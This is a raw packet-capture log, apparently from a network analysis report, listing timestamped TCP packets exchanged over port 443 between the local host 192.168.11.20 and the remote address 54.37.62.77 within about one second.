                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759749889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759926081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759990931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.760087967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.760087967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.760134935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.760166883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.760166883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.760217905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.760217905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.763370991 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.763425112 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.763837099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.763865948 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.764050961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.767517090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.767579079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.767730951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.767785072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.767847061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.769124031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.769177914 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.769340992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.769340992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.769397020 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.769423008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.769423008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.771828890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.771893024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772022963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772022963 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772083998 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772108078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772108078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772108078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772854090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.772906065 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773089886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773089886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773089886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773089886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773149967 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773194075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773861885 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.773922920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.774060965 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.774061918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.774061918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.774061918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.774121046 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.774166107 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.777863979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.777918100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.778688908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.778688908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.778728962 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.778883934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.778913021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.778990984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.779072046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.779253006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.779273987 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.779445887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.779943943 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.780019045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.780230045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.780282021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.780381918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782185078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782249928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782406092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782406092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782459974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782484055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782484055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.782484055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783227921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783282042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783438921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783440113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783495903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783520937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783520937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783521891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783849001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.783900976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.784044027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.784099102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.784117937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.784117937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.784214020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.785948992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.786003113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.786194086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.786247015 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.786266088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.786784887 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.786839962 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.786962032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787014008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787034035 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787095070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787595987 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787642002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787746906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787818909 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787836075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.787888050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.788810015 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.788850069 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789001942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789001942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789041996 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789058924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789058924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789159060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789709091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789740086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789892912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789892912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789933920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789963007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789963007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.789963007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.790000916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.790906906 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.790945053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.791145086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.791145086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.791186094 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.791203022 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792298079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792351961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792475939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792476892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792516947 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792546034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792624950 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.792624950 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.796166897 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.796212912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.796469927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.796489000 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.796613932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.798201084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.798257113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.798388958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.798428059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.798449993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.798449993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.798528910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799685955 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799762964 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799834967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799834967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799851894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799881935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799881935 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799930096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.799982071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801485062 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801506042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801645041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801645041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801736116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801736116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801745892 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.801781893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.802664042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.802694082 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.802814007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.802814007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.802826881 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.803200960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.803200960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.803845882 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.803874969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.803983927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.803983927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.804028988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.804028988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.804040909 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.804101944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.804156065 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.805164099 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.805195093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806329966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806329966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806329966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806329966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806329966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806329966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806350946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806365967 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806395054 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806691885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.806704044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.807324886 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.807352066 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.807526112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.807526112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.807539940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.807703972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.807703972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808451891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808480024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808603048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808603048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808619022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808636904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808706045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808753014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.808753014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809463978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809489965 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809633970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809633970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809659004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809659958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809674978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809709072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809804916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810461044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810487986 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810636044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810636044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810645103 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810652018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810755968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811729908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811744928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811897993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811897993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811908007 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.812016010 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.812016010 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907521009 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907610893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907753944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907845974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907876015 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.908071041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909651995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909737110 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909867048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909867048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909929037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909961939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909961939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910125017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910597086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910653114 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910845995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910845995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910845995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910923004 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.910940886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.911148071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.949548960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.949606895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.949827909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.949882030 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.949918985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.950100899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.950812101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.950867891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.951095104 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.951096058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.951152086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.951364994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.951925993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.952008963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.952101946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.952102900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.952157974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.952193975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.952297926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.952354908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.953126907 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.953183889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.953304052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.953375101 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.953409910 CET4434975554.37.62.77192.168.11.20
